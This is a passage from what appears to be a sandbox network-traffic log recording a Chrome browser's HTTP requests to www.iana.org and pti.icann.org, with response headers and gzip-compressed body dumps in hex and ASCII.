                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Accept-Encoding: gzip, deflate
                            Accept-Language: en-US,en;q=0.9
                            Oct 10, 2024 10:17:11.401343107 CEST1236INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 07:50:02 GMT
                            Server: Apache
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            Last-Modified: Wed, 06 Mar 2024 16:51:21 GMT
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, max-age=3600
                            Expires: Thu, 10 Oct 2024 08:50:02 GMT
                            Content-Encoding: gzip
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Age: 1629
                            Content-Length: 1508
                            Keep-Alive: timeout=2, max=358
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 58 cd 6e dc 36 10 3e 57 4f c1 e8 d0 93 b5 b2 b7 a8 53 34 5a 01 0b 27 41 0c 14 0b c3 75 10 a0 97 80 a2 66 57 74 28 51 21 a9 dd 6c 4f 7d 8d be 5e 9f a4 33 a4 b4 ff b1 e3 06 68 62 c0 2b 72 c4 f9 e1 37 c3 99 a1 a2 ec 59 a9 85 5b b7 c0 2a 57 ab 3c ca 86 07 f0 32 8f 7e c8 9c 74 0a f2 57 9f 78 dd 2a 60 2f 75 cd 65 63 b3 34 90 23 5c 50 83 e3 4c 54 dc 58 70 93 b8 73 f3 e4 97 98 a5 f9 f0 a6 72 ae 4d e0 63 27 97 93 f8 4a 37 0e 1a 97 90 ba 98 89
                            Data Ascii: Xn6>WOS4Z'AufWt(Q!lO}^3hb+r7Y[*W<2~tWx*`/uec4#\PLTXpsrMc'J7
                            Oct 10, 2024 10:17:11.401359081 CEST1236INData Raw: 30 9b c4 0e 3e b9 94 d4 be d8 c8 39 12 d3 f0 1a 26 f1 52 c2 aa d5 c6 ed 30 af 64 e9 aa 49 09 4b 29 20 f1 93 33 26 1b e9 24 57 89 15 5c c1 e4 22 c8 41 49 4a 36 1f 98 01 35 89 ad 5b 2b b0 15 00 8a aa 0c cc 27 71 fa 5e 58 9b 8e cf c7 e3 54 f2 86 bf
                            Data Ascii: 0>9&R0dIK) 3&$W\"AIJ65[+'q^XT_AaRcos&1Vv3e"e+PCvDSF%Y#HM?v`{Y^O`0#Ye.9<brd917J/Q|0@cr3ot-d)
                            Oct 10, 2024 10:17:11.401386976 CEST115INData Raw: ff d8 c2 61 4b a8 24 d9 a7 e7 c7 30 1d 28 58 ad 56 5b 05 78 cd bd be 9a ce 66 24 2a 34 6f 5b f4 b6 dd d1 1e 76 0a 16 5c 61 ff 28 29 8a 9e 78 69 25 13 ec 91 0d 78 2b 58 72 b1 4e 5b 8d 5b 5d 53 96 f3 73 76 e3 e7 5f 78 37 7d 58 b4 d3 94 ee c0 d4 96
                            Data Ascii: aK$0(XV[xf$*4o[v\a()xi%x+XrN[[]Ssv_x7}XZCrh|7||H'+
                            Oct 10, 2024 10:17:11.401403904 CEST115INData Raw: ff d8 c2 61 4b a8 24 d9 a7 e7 c7 30 1d 28 58 ad 56 5b 05 78 cd bd be 9a ce 66 24 2a 34 6f 5b f4 b6 dd d1 1e 76 0a 16 5c 61 ff 28 29 8a 9e 78 69 25 13 ec 91 0d 78 2b 58 72 b1 4e 5b 8d 5b 5d 53 96 f3 73 76 e3 e7 5f 78 37 7d 58 b4 d3 94 ee c0 d4 96
                            Data Ascii: aK$0(XV[xf$*4o[v\a()xi%x+XrN[[]Ssv_x7}XZCrh|7||H'+


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.449769192.0.46.8801360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            Oct 10, 2024 10:17:23.332695007 CEST445OUTGET /domains/idn-tables HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Accept-Encoding: gzip, deflate
                            Accept-Language: en-US,en;q=0.9
                            Oct 10, 2024 10:17:23.787558079 CEST1236INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:23 GMT
                            Server: Apache
                            Vary: Accept-Encoding
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Expires: Thu, 10 Oct 2024 08:48:09 GMT
                            X-Content-Type-Options: nosniff
                            Age: 1754
                            Content-Type: text/html; charset=utf-8
                            Content-Encoding: gzip
                            Cache-Control: public, max-age=3600, stale-while-revalidate=900
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Keep-Alive: timeout=2, max=358
                            Connection: Keep-Alive
                            Transfer-Encoding: chunked
                            Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 31 66 61 30 0d 0a e4 fd cb 72 dc 48 96 ef 8d 8e 4f 3f 45 7c 75 cc da 54 96 49 25 49 dd ad ab cb 4c 97 2c 49 2d 51 4a 13 95 f5 7d 7d 26 32 67 c0 19 80 02 97 68 5c 48 85 46 fb 35 f6 fc 4c ce 78 3f c2 7e 93 fd 24 c7 1d 11 24 dc 81 05 87 83 84 23 7c ad 2e cb ac 94 88 20 19 bf 70 87 63 5d ff eb 6f ff 57 90 2d cb ed 86 2f c2 32 89 ff fe 2f 7f bb f9 0f 67 c1 df ff e5 ff f5 b7 32 2a 63 fe f7 2f 7c 93 15 51 99 e5 db 45 76 b9 78 ff e6 d3 e2 8f 9c 2d cb 68 c9 8b bf fd
                            Data Ascii: a1fa0rHO?E|uTI%IL,I-QJ}}&2gh\HF5Lx?~$$#|. pc]oW-/2/g2*c/|QEvx-h
                            Oct 10, 2024 10:17:23.787578106 CEST1236INData Raw: b6 7b c9 bf 88 17 27 bc 64 8b 65 c8 f2 82 97 ff fe 97 aa bc 3c 7a fe 97 c5 6f 7f bf b9 12 96 e5 e6 88 ff 57 15 5d fd fb 5f 5e 67 69 c9 d3 f2 48 fe ea bf 2c 96 bb bf fd fb 5f 4a fe a3 fc 4d be 85 7f bb fd 39 9d 1f 93 b2 84 ff fb 5f ae 22 7e bd c9
                            Data Ascii: {'de<zoW]_^giH,_JM9_"~R((x_G_~]DiTF,>*,~9'Q^<6EQa//}[oE,eWRCUB_o+oYNX&_P^emwvv_|/~
                            Oct 10, 2024 10:17:23.787590981 CEST1236INData Raw: 8d 78 68 26 51 c9 83 7b a3 56 41 c8 2e a2 6f 2c ff f6 b8 b3 8c bb 6b 37 b0 2f 73 f1 17 2b cb f7 b1 d5 51 72 72 74 22 58 5f a8 df f8 f2 a2 5a bc 91 bf 73 71 be 2d 4a 9e 14 32 42 b3 78 9f 5e 66 c2 45 aa 43 4e af 79 5a e6 fc be d4 4b 16 f0 64 2b a3
                            Data Ascii: xh&Q{VA.o,k7/s+Qrrt"X_Zsq-J2Bx^fECNyZKd+]CdnOyA,D\9<}8o]}<y;Znxpn(;9>:}z^!75)fA N[|9Ob_UGbzMr}dg
                            Oct 10, 2024 10:17:23.787671089 CEST1236INData Raw: 26 c0 1b 8b 7c f1 40 98 09 6c 37 3b e2 9d b8 5d 7f 59 bc 8b 72 71 fe a6 4c fc f1 03 2b d9 5a fc 11 f3 cd ba 4e a1 b2 bb e6 83 f8 c0 d2 94 05 0c 33 61 98 18 f7 f2 87 30 e1 39 66 be 2c 07 ca 3b 14 be 3a 36 d5 da c8 ab 2a 96 7b 99 a5 98 f7 6e 8f eb
                            Data Ascii: &|@l7;]YrqL+ZN3a09f,;:6*{n|IML|g,f[oqk;,M3sm1EM.6)bB8NH>Wq}UaCCE@]u<o2BS*.wM]:, n~]|z6+jTO\5
                            Oct 10, 2024 10:17:23.787676096 CEST1236INData Raw: 6f de 93 c2 1a ce 3a 29 6a 1d e7 3d 27 ac e5 ac 73 22 d7 73 de 93 c2 35 9f 3a 29 6a 5d e7 1b 4e 50 db b9 c5 89 5a df f9 06 14 ac 72 6d 81 22 d6 79 be c1 04 b5 9e 5b 98 b8 f5 9e b5 a8 dc 20 2c 31 dd 67 83 de c7 86 e5 65 c2 d3 b2 2d 79 4d 40 f3 a3
                            Data Ascii: o:)j='s"s5:)j]NPZrm"y[ ,1ge-yM@FHFF!titFd=D@:`D4A:\tA:lTA:`TA`h4Bn:K@9Q6$qUA+"\ "|UO$'n\9@qg7@M$&
                            Oct 10, 2024 10:17:23.787689924 CEST1236INData Raw: 5a bf b5 83 46 48 bf b5 7b 48 12 d1 6f ed 80 11 d1 6f ed 70 11 d2 6f ed b0 51 d1 6f ed 80 51 d1 6f ed 82 a1 d1 6f bd 7d eb 70 59 42 1b 0c 6f 5f 40 5f 21 a8 93 3a d0 e3 c7 d2 dc 7f a4 3d a5 3f bd 7f fd f0 e5 d7 7b 63 84 31 2f 19 d8 92 bd bb 84 b9
                            Data Ascii: ZFH{HoopoQoQoo}pYBo_@_!:=?{c1/',<}*>o![|({>i"a[ozo >izo`{Zt({oz1_zP[T~P~B^W-e={NN
                            Oct 10, 2024 10:17:23.787738085 CEST1236INData Raw: 14 02 d6 02 12 8a 56 37 90 e8 43 d5 92 d0 78 3f 92 08 52 0b 4a 28 42 dd 50 e2 0f 4f 0b 44 28 36 ad 18 e4 e8 03 d3 02 11 8a 4a 37 88 f8 43 d2 3f 98 44 ec 4c 61 f9 c1 ee 80 68 35 81 e5 74 37 b6 59 43 9c 7a 02 8b 80 12 fe be 01 ca de df f7 66 aa 8c
                            Data Ascii: V7Cx?RJ(BPOD(6J7C?DLah5t7YCzf`isTMPah`Q.OXG''*:c`xUFy>q8YKg,{+&#\0[sPjD*'Ov!'@vdc'
                            Oct 10, 2024 10:17:23.787744999 CEST1236INData Raw: e3 0b 53 ad 14 d9 cf 34 46 2a d2 17 a4 c0 7c 4f 8d 51 69 f5 05 89 c7 66 24 c8 59 f1 9b a8 56 7d ec 27 1a 27 fb e8 0b 54 2d f3 d8 0f 35 46 e7 d1 1b a4 ca 8c 54 e5 f6 fa 63 be 30 25 6b 23 93 b0 62 78 90 d9 8b 55 fa 82 95 9b 77 df 17 f1 dd f8 a0 36
                            Data Ascii: S4F*|OQif$YV}''T-5FTc0%k#bxUw6oT/HZSa6#y)433VeTKdhdTQsv_3:Y;>b&~6t`mCuxPMW.|b%H;zDXx{z%
                            Oct 10, 2024 10:17:23.787756920 CEST1236INData Raw: 4f e4 58 80 13 6d fa c6 6b b1 5c 39 8b 3f 45 cb c5 c7 f2 de 12 c3 3b ac fd e0 f1 7e a8 c9 e7 8e cf 45 b6 1f 3a de 4f 36 f1 cc f1 b9 b8 ea 3b cc 4c 66 79 97 79 85 55 f7 88 3d 35 40 8d d2 08 7c 6a 71 7c 3c 3e 3a 3e 3d 3a 7e ec 1a ec 67 38 b0 5a 23
                            Data Ascii: OXmk\9?E;~E:O6;LfyyU=5@|jq|<>:>=:~g8Z#4}Y18e{H?S@3_%/!|^d)18VS|vtLW8`N8^b[VhR}pVSuYk..TV*06(
                            Oct 10, 2024 10:17:23.787770987 CEST1236INData Raw: 6a 6a 11 f6 79 a0 c0 86 e2 06 6a fa 6e 62 71 2e 3e 39 3a 39 75 8c 05 76 bb 35 58 53 b7 ba cd 03 95 42 21 33 e5 ac a8 ca 69 87 00 48 ac 17 8e 99 c0 ea 92 86 c9 41 69 c9 0c 37 15 28 fd a6 42 e5 65 b5 aa 26 bd ad e6 59 2d b0 e2 a0 01 9b bc dc 00 98
                            Data Ascii: jjyjnbq.>9:9uv5XSB!3iHAi7(Be&Y-2>}O?ao&79ivNtiw(tV6)jRa@7<+(r_j?he(c8F8N#n*_pBn{A'7MeR[dx_GX"\6BT
                            Oct 10, 2024 10:17:23.792519093 CEST906INData Raw: 84 2b 95 14 26 9c 95 4a 3f e1 a2 9e 9f 77 88 92 f9 04 05 96 e0 37 50 08 4b f0 63 b6 5c 03 52 c3 f2 cb 58 c5 86 6b a4 ae dc b0 8a 84 51 70 78 87 d5 91 01 d2 b0 b0 89 0e ef 98 3a b2 c3 1a 13 3e e1 e1 9a aa 2b 3d ac 52 61 13 1f ae 91 ba f2 c3 2a 12
                            Data Ascii: +&J?w7PKc\RXkQpx:>+=Ra*:&By[FJHwDMA qM$V:6a+M2a'*:qa)2*F+ba!7 FA+b*:aGW.[sv}QSSWWc&{


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.449770192.0.46.8801360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            Oct 10, 2024 10:17:31.270153999 CEST439OUTGET /domains/arpa HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Accept-Encoding: gzip, deflate
                            Accept-Language: en-US,en;q=0.9
                            Oct 10, 2024 10:17:31.370946884 CEST1236INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:11:33 GMT
                            Server: Apache
                            Vary: Accept-Encoding
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Expires: Thu, 10 Oct 2024 09:51:17 GMT
                            X-Content-Type-Options: nosniff
                            Age: 1573
                            Content-Encoding: gzip
                            Cache-Control: public, max-age=21603
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Content-Length: 2865
                            Keep-Alive: timeout=2, max=358
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=utf-8
                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 5a ef 6e 1b b9 11 ff 1c 3d 05 6f 7b 08 6c 20 ab b5 1c db 71 2e b2 00 9f ed 34 46 71 8e 61 3b 28 d0 2f 06 b5 4b 49 4c b8 cb 0d c9 95 ad 16 05 fa 1a 7d bd 3e 49 67 48 ee 6a 25 ad 64 e9 20 a5 bd 20 b0 b8 fc 33 43 fe 66 38 1c 0e a7 fb 53 22 63 33 c9 19 19 99 54 f4 5a dd f2 87 d1 a4 d7 7a d5 35 dc 08 d6 6b 9f df dd 9e 93 4b 99 52 9e 75 23 57 d7 82 d6 94 19 4a e2 11 55 9a 99 b3 a0 30 83 f0 34 20 51 af 6c 19 19 93 87 ec 7b c1 c7 67 c1 85 cc 0c cb 4c 88 bc 02 12 bb af b3 c0 b0 67 13 21 cf 0f 15 9d 05 32 19 4d d9 59 30 e6 ec 29 97 ca d4 06 3f f1 c4 8c ce 12 36 e6 31 0b ed c7
                            Data Ascii: Zn=o{l q.4Fqa;(/KIL}>IgHj%d 3Cf8S"c3TZz5kKRu#WJU04 Ql{gLg!2MY0)?61
                            Oct 10, 2024 10:17:31.370963097 CEST224INData Raw: 1b c2 33 6e 38 15 a1 8e a9 60 67 1d 47 07 28 09 9e 7d 23 8a 89 b3 40 9b 89 60 7a c4 18 90 1a 29 36 38 0b a2 c7 58 eb e8 f0 e0 f0 30 e2 34 a3 8f 4f ac af b9 61 6d a8 0d ec 34 6a 83 47 30 85 b8 30 84 c3 2c 02 82 ab 39 0b 78 4a 87 2c 82 9a 29 41 9e
                            Data Ascii: 3n8`gG(}#@`z)68X04Oam4jG00,9xJ,)AR=b66G5+?V1&:u#`8.en0 ju#'V/7SOW!Vohr`k/0T80ttz< O2e9t#Z9Z
                            Oct 10, 2024 10:17:31.370980024 CEST1236INData Raw: 1d f3 21 35 1c 44 30 37 8f 42 cc 56 d8 4a c1 7b d3 09 26 56 8b 01 16 a7 ce 1a 79 76 23 e8 f2 c2 b8 5c 49 23 63 29 60 e4 6d 59 5c 77 6c 56 a4 7d a6 60 e4 8d 2b 4c c7 75 7f 0a c3 17 c6 b2 27 1c 08 7f ab 51 61 f8 12 43 da 97 85 09 7a e7 f8 d3 3c c9
                            Data Ascii: !5D07BVJ{&Vyv#\I#c)`mY\wlV}`+Lu'QaCz<nT/:-AhUG}*cJyXh0v_G~vo2c7P!KayaH'%51PZ$<I,!w2-U`S\1Zp$0h$3Rh(XT`]TL"6
                            Oct 10, 2024 10:17:31.370991945 CEST1203INData Raw: 53 da cd 71 39 81 3d 03 f7 b6 4b 26 98 0b 91 92 cb 0a cb fb 89 36 2c dd da 01 73 74 e0 cf 56 2c bd 08 d3 46 b4 4f df 1f 7b 8b 84 a5 9d 89 20 fb 9d 22 b8 c1 83 fa 8f 04 fe 02 40 51 19 96 82 12 46 be 7c ad 8d fd 62 b0 f6 b0 f7 1b 20 65 6c d4 0b 3e
                            Data Ascii: Sq9=K&6,stV,FO{ "@QF|b el>lxKCL1``u:K|zY#x6vA<{v!cQvZ/}]#(yPyF=-)()MB,|Ex^_F.&K{


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.449778192.0.33.10801360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            Oct 10, 2024 10:17:36.376215935 CEST428OUTGET / HTTP/1.1
                            Host: pti.icann.org
                            Connection: keep-alive
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Accept-Encoding: gzip, deflate
                            Accept-Language: en-US,en;q=0.9


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.449780192.0.33.10801360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            Oct 10, 2024 10:17:40.044893980 CEST454OUTGET / HTTP/1.1
                            Host: pti.icann.org
                            Connection: keep-alive
                            Cache-Control: max-age=0
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Accept-Encoding: gzip, deflate
                            Accept-Language: en-US,en;q=0.9


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.449782192.0.33.10801360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            Oct 10, 2024 10:17:41.587347031 CEST454OUTGET / HTTP/1.1
                            Host: pti.icann.org
                            Connection: keep-alive
                            Cache-Control: max-age=0
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Accept-Encoding: gzip, deflate
                            Accept-Language: en-US,en;q=0.9


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.449774192.0.46.8801360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            Oct 10, 2024 10:17:41.886550903 CEST434OUTGET /contact HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Accept-Encoding: gzip, deflate
                            Accept-Language: en-US,en;q=0.9
                            Oct 10, 2024 10:17:42.001391888 CEST1236INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:41 GMT
                            Server: Apache
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            Last-Modified: Sun, 18 Jul 2021 22:53:52 GMT
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, max-age=3600
                            Expires: Thu, 10 Oct 2024 09:17:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Encoding: gzip
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Keep-Alive: timeout=2, max=358
                            Connection: Keep-Alive
                            Transfer-Encoding: chunked
                            Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 35 66 32 0d 0a cd 58 ef 6e db 36 10 ff 1c 3f 05 ab 15 45 82 55 56 e2 a6 c0 da c8 c6 8c 64 7f 0c 0c 86 97 26 18 b0 2f 01 25 9d 2d 26 94 a8 92 94 5d 6f 18 b0 d7 d8 eb ed 49 76 24 25 5b b6 9c d8 59 81 75 fe 60 91 47 de 8f c7 e3 f1 fe 30 7c 91 88 58 2f 0b 20 a9 ce f8 a0 13 d6 1f a0 c9 a0 73 14 6a a6 39 0c 2e 45 ae 69 ac c9 ad 0a 03 47 e9 e0 58 06 9a 92 38 a5 52 81 ee 7b a5 9e fa df 78 24 18 d4 23 a9 d6 85 0f 1f 4b 36 ef 7b 06 00 72 ed 9b 95
                            Data Ascii: a5f2Xn6?EUVd&/%-&]oIv$%[Yu`G0|X/ sj9.EiGX8R{x$#K6{r
                            Oct 10, 2024 10:17:42.001404047 CEST1236INData Raw: 3c 12 bb 5e df d3 f0 49 07 66 c5 8b 15 4e 0b 26 a7 19 f4 bd 39 83 45 21 a4 6e 30 2f 58 a2 d3 7e 02 73 16 83 6f 3b af 09 cb 99 66 94 fb 2a a6 1c fa 67 0e 07 91 38 cb 1f 88 04 de f7 94 5e 72 50 29 00 42 a5 12 a6 7d 2f b8 8b 95 0a 7a a7 bd 5e c0 68
                            Data Ascii: <^IfN&9E!n0/X~so;f*g8^rP)B}/z^hN)T`NQ1{,3d,x|3sf8ZSdx:G? {nw0|MC&lNXs.fAc7.;0JXi7#(2(P}0
                            Oct 10, 2024 10:17:42.001415968 CEST164INData Raw: d6 0b 04 18 ae 2e 87 e3 f1 ba d0 5b 6b cf e5 34 2d dd 71 2c 33 79 2e 30 f9 81 67 3f 25 18 11 54 4b 86 02 ab 34 1a 2f 83 42 e0 56 97 c6 cb d9 3e 99 d8 fe 81 2f 06 4f 43 6b 61 dc 1d c8 4c a1 8a c8 07 90 e6 f9 eb 19 65 fe 66 9d 5f a7 79 98 f1 d5 af
                            Data Ascii: .[k4-q,3y.0g?%TK4/BV>/OCkaLef_yD/*?J{U;=b{i1@^E)p/8;0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.449783192.0.46.8801360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            Oct 10, 2024 10:17:46.846806049 CEST443OUTGET /about/excellence HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Accept-Encoding: gzip, deflate
                            Accept-Language: en-US,en;q=0.9
                            Oct 10, 2024 10:17:47.989037037 CEST1236INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 07:29:17 GMT
                            Server: Apache
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            Last-Modified: Sun, 18 Jul 2021 22:53:48 GMT
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, max-age=3600
                            Expires: Thu, 10 Oct 2024 08:29:17 GMT
                            Content-Encoding: gzip
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Age: 2909
                            Content-Length: 2193
                            Keep-Alive: timeout=2, max=358
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 59 dd 6e db c8 15 be 8e 9f 62 96 5d 2c 6c c0 14 6d ef 5e 6c 62 49 80 eb 24 58 03 8d e1 cd 66 51 a0 37 c6 88 3c 92 26 26 39 cc cc 50 b2 b6 28 d0 d7 e8 eb f5 49 fa 9d 19 92 a2 7e 62 2b 0d d0 54 17 12 79 66 ce ff 99 f3 33 1a 7e 97 e9 d4 ad 2a 12 73 57 e4 e3 a3 61 fb 43 32 1b 1f bd 18 3a e5 72 1a ff b9 b6 aa 24 6b c5 9b c7 94 f2 9c ca 94 84 2c 33 f1 6b 2d 73 e5 56 e2 9d 2c e5 8c 0a 2a dd 30 09 18 47 c0 2d c8 49 91 ce a5 b1 e4 46 51 ed a6
                            Data Ascii: Ynb],lm^lbI$XfQ7<&&9P(I~b+Tyf3~*sWaC2:r$k,3k-sV,*0G-IFQ
                            Oct 10, 2024 10:17:47.989051104 CEST1236INData Raw: f1 cf 91 48 c6 ed ca dc b9 2a a6 4f b5 5a 8c a2 6b 5d 3a 60 c7 2c 49 24 d2 f0 36 8a 1c 3d ba 84 25 ba ec e8 ec 90 29 65 41 a3 68 a1 68 59 69 e3 7a c8 4b 95 b9 f9 28 a3 85 4a 29 f6 2f a7 42 95 ca 29 99 c7 36 95 39 8d ce 03 1d 50 ca 55 f9 20 0c e5
                            Data Ascii: H*OZk]:`,I$6=%)eAhhYizK(J)/B)69PU UNvNRsCQ&gKXhh!!BZ; E$XQ&dMPdC!=rfS*z|&emSMf5h0/@gUaa4lNf|$fj!T60\td7AV6Bg
                            Oct 10, 2024 10:17:47.989061117 CEST800INData Raw: 13 ac af 12 86 b8 10 7b 35 36 6a 56 6d 83 1b 9a ac 14 62 bf c7 9d bb 6c 55 22 0f 82 02 f7 de c1 f5 6b ea ad 89 7c 8d b2 64 b8 09 b7 62 89 92 84 1d 10 87 69 61 bd 63 5c a3 14 ac 82 da 4d 83 90 84 0e 21 bc a0 73 f0 5d c6 ba 8b 08 9d c3 fe c6 ef 7e
                            Data Ascii: {56jVmblU"k|dbiac\M!s]~-EtotFsboK}j^|O<7:YF}h[6yGdkzyu Q]q|ar<oC:Sn%[=Rz
                            Oct 10, 2024 10:17:47.989115000 CEST800INData Raw: 13 ac af 12 86 b8 10 7b 35 36 6a 56 6d 83 1b 9a ac 14 62 bf c7 9d bb 6c 55 22 0f 82 02 f7 de c1 f5 6b ea ad 89 7c 8d b2 64 b8 09 b7 62 89 92 84 1d 10 87 69 61 bd 63 5c a3 14 ac 82 da 4d 83 90 84 0e 21 bc a0 73 f0 5d c6 ba 8b 08 9d c3 fe c6 ef 7e
                            Data Ascii: {56jVmblU"k|dbiac\M!s]~-EtotFsboK}j^|O<7:YF}h[6yGdkzyu Q]q|ar<oC:Sn%[=Rz
                            Oct 10, 2024 10:17:47.989989042 CEST1236INHTTP/1.1 200 OK
